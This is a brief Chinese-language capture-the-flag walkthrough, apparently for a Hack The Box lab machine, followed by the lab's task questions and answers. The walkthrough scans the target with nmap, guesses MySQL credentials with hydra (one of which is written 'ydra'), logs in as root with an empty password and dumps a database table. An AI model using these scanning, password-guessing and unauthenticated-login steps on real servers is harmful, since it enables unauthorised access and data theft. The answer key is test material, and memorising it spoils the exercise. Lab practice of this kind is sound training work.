file

扫描, 发现3306端口开放

nmap -A 10.129.95.232

file

弱密码,密码为空,如果破解其他密码可以把 -e nsr 换成字典路径即可

ydra -l root -e nsr mysql://10.129.95.232

file

登录mysql

mysql -uroot -h 10.129.95.232
    show databases;      #列数据库
    use htb;                    #切换数据库
    show tables;             # 列表
    select * from config;  #获取表中数据

file

  • Task 1 During our scan, which port do we find serving MySQL?

    3306
  • Task 2 What community-developed MySQL version is the target running?

    MariaDB
  • Task 3 When using the MySQL command line client, what switch do we need to use in order to specify a login username?

    -u
  • Task 4 Which username allows us to log into this MariaDB instance without providing a password?

    root
  • Task 5 In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

    *
  • Task 6 In SQL, what symbol do we need to end each query with?

    ;
  • Task 7 There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?

    htb